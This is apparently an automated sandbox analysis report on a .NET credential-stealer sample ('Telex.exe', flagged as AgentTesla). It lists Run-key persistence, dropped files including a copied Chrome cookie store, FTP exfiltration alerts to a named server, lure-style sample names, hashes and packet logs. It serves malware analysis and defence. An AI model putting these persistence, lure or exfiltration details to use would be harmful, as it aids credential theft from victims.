                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, hostedocsp.globalsign.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          20:45:11API Interceptor820x Sleep call for process: Telex.exe modified
                          20:45:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1 C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                          20:45:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1 C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                          20:45:48API Interceptor465x Sleep call for process: mDPTQJF1.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          192.145.239.54eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                            eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                              TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exeGet hashmaliciousBrowse
                                Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exeGet hashmaliciousBrowse
                                  Turkistanman OCT order Swift 40 deposit against order PO 277138293.exeGet hashmaliciousBrowse
                                    ebElectronic Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exeGet hashmaliciousBrowse
                                      eElectronic 4 Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exeGet hashmaliciousBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        api.globalsign.cloud263a35c3_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        POI09876OIUY.exeGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        Request Sample products.exeGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        6823a552_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        3bc8e970_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        079c508f_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        80df624d_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        8333bdd5e1560584a0302e2fe63cf9d81ebe5b48e7e2b.exeGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        7b73e459_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        lBmH1dux3rkWHAs.exeGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        INQUIRY.exeGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        0908000000.exeGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        urgent request fro quotation CONO GROUP LLC DK983746GT.exeGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        un6IVL1qYU.dllGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        dVMxk14XPULdlBw.exeGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        Purchase Order-1245102021.xlsGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        SecuriteInfo.com.Trojan.Win32.Save.a.32673.exeGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        13629175_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        c681a5e2_by_Libranalysis.dllGet hashmaliciousBrowse
                                        • 104.18.24.243
                                        CMjsfg603M.exeGet hashmaliciousBrowse
                                        • 104.18.25.243
                                        ftp.universalinks.neteLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        Turkistanman OCT order Swift 40 deposit against order PO 277138293.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        ebElectronic Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        eElectronic 4 Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exeGet hashmaliciousBrowse
                                        • 192.145.239.54

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        IMH-WESTUSPO 367628usa.exeGet hashmaliciousBrowse
                                        • 209.182.202.96
                                        eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        scan of document 5336227.xlsmGet hashmaliciousBrowse
                                        • 192.249.126.181
                                        scan of invoice 91510.xlsmGet hashmaliciousBrowse
                                        • 192.249.126.181
                                        scan of bill 0905.xlsmGet hashmaliciousBrowse
                                        • 192.249.126.181
                                        PO9448882.exeGet hashmaliciousBrowse
                                        • 209.182.202.96
                                        check 6746422.xlsmGet hashmaliciousBrowse
                                        • 192.249.126.181
                                        TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        proforma invoice.exeGet hashmaliciousBrowse
                                        • 192.249.124.39
                                        SOA.exeGet hashmaliciousBrowse
                                        • 173.231.198.30
                                        Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exeGet hashmaliciousBrowse
                                        • 192.145.239.54
                                        SecuriteInfo.com.Heur.32597.xlsGet hashmaliciousBrowse
                                        • 144.208.70.30
                                        SecuriteInfo.com.Heur.32597.xlsGet hashmaliciousBrowse
                                        • 144.208.70.30
                                        SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
                                        • 144.208.70.30
                                        Email - Payment Report.htmlGet hashmaliciousBrowse
                                        • 23.235.214.102
                                        PO472020.xltGet hashmaliciousBrowse
                                        • 199.250.214.202
                                        PO472020.xltGet hashmaliciousBrowse
                                        • 199.250.214.202
                                        PO472020.xltGet hashmaliciousBrowse
                                        • 199.250.214.202
                                        SecuriteInfo.com.Exploit.Siggen3.16583.277.xlsGet hashmaliciousBrowse
                                        • 199.250.214.202

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Telex.exe.log
                                        Process:C:\Users\user\Desktop\Telex.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1314
                                        Entropy (8bit):5.350128552078965
                                        Encrypted:false
                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mDPTQJF1.exe.log
                                        Process:C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1314
                                        Entropy (8bit):5.350128552078965
                                        Encrypted:false
                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                                        Process:C:\Users\user\Desktop\Telex.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):879616
                                        Entropy (8bit):7.385079919018695
                                        Encrypted:false
                                        SSDEEP:12288:ARhATChEI0rx5K8LeU8NA+tTTqcDaGZSxMpC4azefqBqTHzz8dwhbrx6qQMjvLey:A0xsIeU8i+l9aGZ2M5biBqTSIbRvLey
                                        MD5:01FE9288B37BDEB3684DB4BD497685E2
                                        SHA1:083282559E805CEF41F6C869D12BCA814B72DCD6
                                        SHA-256:EC9C7ECEABE73740FEFB573D42BC06A3C7E65173F2C7C3030CBB50EDD8E3BA17
                                        SHA-512:CB697AA9D7E37A98B90BE71706987B2830D71C06AB823555BC620C64F36F27C8299ACF7E6AC346B3E33B17FA2C6B307983725610DEAD585C19E15305C54677AC
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 26%
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..`..............P.............B.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...H.... ...................... ..`.rsrc...............................@..@.reloc...............j..............@..B................$.......H...........H...........@................................................0............( ...(!.........(.....o"....*.....................(#......($......(%......(&......('....*N..(....oS...((....*&..()....*.s*........s+........s,........s-........s.........*....0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+..*.0......
                                        C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\Telex.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: [ZoneTransfer]....ZoneId=0
                                        C:\Users\user\AppData\Roaming\vkq1voel.sze\Chrome\Default\Cookies
                                        Process:C:\Users\user\Desktop\Telex.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                        Category:modified
                                        Size (bytes):20480
                                        Entropy (8bit):0.698304057893793
                                        Encrypted:false
                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.385079919018695
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Telex.exe
                                        File size:879616
                                        MD5:01fe9288b37bdeb3684db4bd497685e2
                                        SHA1:083282559e805cef41f6c869d12bca814b72dcd6
                                        SHA256:ec9c7eceabe73740fefb573d42bc06a3c7e65173f2c7c3030cbb50edd8e3ba17
                                        SHA512:cb697aa9d7e37a98b90be71706987b2830d71c06ab823555bc620c64f36f27c8299acf7e6ac346b3e33b17fa2c6b307983725610dead585c19e15305c54677ac
                                        SSDEEP:12288:ARhATChEI0rx5K8LeU8NA+tTTqcDaGZSxMpC4azefqBqTHzz8dwhbrx6qQMjvLey:A0xsIeU8i+l9aGZ2M5biBqTSIbRvLey
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..`..............P.............B.... ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:d28ab3b0e0ab96c4

                                        Static PE Info

                                        General

                                        Entrypoint:0x4afc42
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x609BFE26 [Wed May 12 16:11:18 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xafbf00x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x28894.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xadc480xade00False0.803486981039data7.63584673594IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0xb00000x288940x28a00False0.347848557692data5.40026670991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xda0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xb02800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xc0aa80x94a8data
                                        RT_ICON0xc9f500x5488data
                                        RT_ICON0xcf3d80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                        RT_ICON0xd36000x25a8data
                                        RT_ICON0xd5ba80x10a8data
                                        RT_ICON0xd6c500x988data
                                        RT_ICON0xd75d80x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0xd7a400x76data
                                        RT_VERSION0xd7ab80x3acdata
                                        RT_MANIFEST0xd7e640xa2eXML 1.0 document, UTF-8 Unicode (with BOM) text

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2020
                                        Assembly Version1.0.0.0
                                        InternalNameInvalidFilterCriteriaException.exe
                                        FileVersion1.0.0.0
                                        CompanyName
                                        LegalTrademarks
                                        Comments
                                        ProductNameLibraryManagementSystem
                                        ProductVersion1.0.0.0
                                        FileDescriptionLibraryManagementSystem
                                        OriginalFilenameInvalidFilterCriteriaException.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        05/12/21-20:46:53.574423TCP2029927ET TROJAN AgentTesla Exfil via FTP4972821192.168.2.5192.145.239.54
                                        05/12/21-20:46:53.777683TCP2029928ET TROJAN AgentTesla HTML System Info Report Exfil via FTP4972931991192.168.2.5192.145.239.54

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 12, 2021 20:46:51.751831055 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:51.948355913 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:51.948530912 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:52.148454905 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:52.150908947 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:52.347384930 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:52.347407103 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:52.348239899 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:52.571746111 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:52.572772026 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:52.769409895 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:52.773770094 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:52.970360041 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:52.975579023 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.172095060 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.172394037 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.368855000 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.374205112 CEST4972931991192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.409179926 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.574002028 CEST3199149729192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.574112892 CEST4972931991192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.574423075 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.770802975 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.777683020 CEST4972931991192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.778069019 CEST4972931991192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.815486908 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:53.976913929 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.980040073 CEST3199149729192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.980690956 CEST3199149729192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:53.980756998 CEST4972931991192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:54.018568993 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.153923988 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.350323915 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:55.351337910 CEST4973231947192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.393686056 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.547892094 CEST3194749732192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:55.548641920 CEST4973231947192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.548857927 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.745430946 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:55.746002913 CEST4973231947192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.746031046 CEST4973231947192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.800036907 CEST4972821192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.942820072 CEST3194749732192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:55.942846060 CEST2149728192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:55.942857981 CEST3194749732192.145.239.54192.168.2.5
                                        May 12, 2021 20:46:55.942959070 CEST4973231947192.168.2.5192.145.239.54
                                        May 12, 2021 20:46:55.987512112 CEST4972821192.168.2.5192.145.239.54

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 12, 2021 20:45:03.257252932 CEST6530753192.168.2.58.8.8.8
                                        May 12, 2021 20:45:03.296060085 CEST6434453192.168.2.58.8.8.8
                                        May 12, 2021 20:45:03.314757109 CEST53653078.8.8.8192.168.2.5
                                        May 12, 2021 20:45:03.356240034 CEST53643448.8.8.8192.168.2.5
                                        May 12, 2021 20:45:03.459317923 CEST6206053192.168.2.58.8.8.8
                                        May 12, 2021 20:45:03.516536951 CEST53620608.8.8.8192.168.2.5
                                        May 12, 2021 20:45:03.842657089 CEST6180553192.168.2.58.8.8.8
                                        May 12, 2021 20:45:03.891359091 CEST53618058.8.8.8192.168.2.5
